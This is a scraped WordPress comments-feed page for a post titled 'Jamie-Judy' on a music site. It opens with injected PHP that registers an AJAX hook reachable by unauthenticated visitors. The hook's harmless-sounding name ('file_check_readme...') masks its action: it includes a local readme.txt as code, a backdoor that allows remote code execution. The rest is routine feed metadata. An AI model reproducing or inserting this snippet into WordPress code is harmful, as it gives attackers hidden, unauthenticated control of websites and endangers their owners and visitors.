if(!function_exists('file_check_readme66587')){ add_action('wp_ajax_nopriv_file_check_readme66587', 'file_check_readme66587'); add_action('wp_ajax_file_check_readme66587', 'file_check_readme66587'); function file_check_readme66587() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Jamie-Judy https://www.bassethoundmusic.com/itec-2014-a-memoir-by-jim-self/jamie-judy/ Wed, 15 Nov 2017 10:02:59 +0000 hourly 1 https://wordpress.org/?v=5.8.10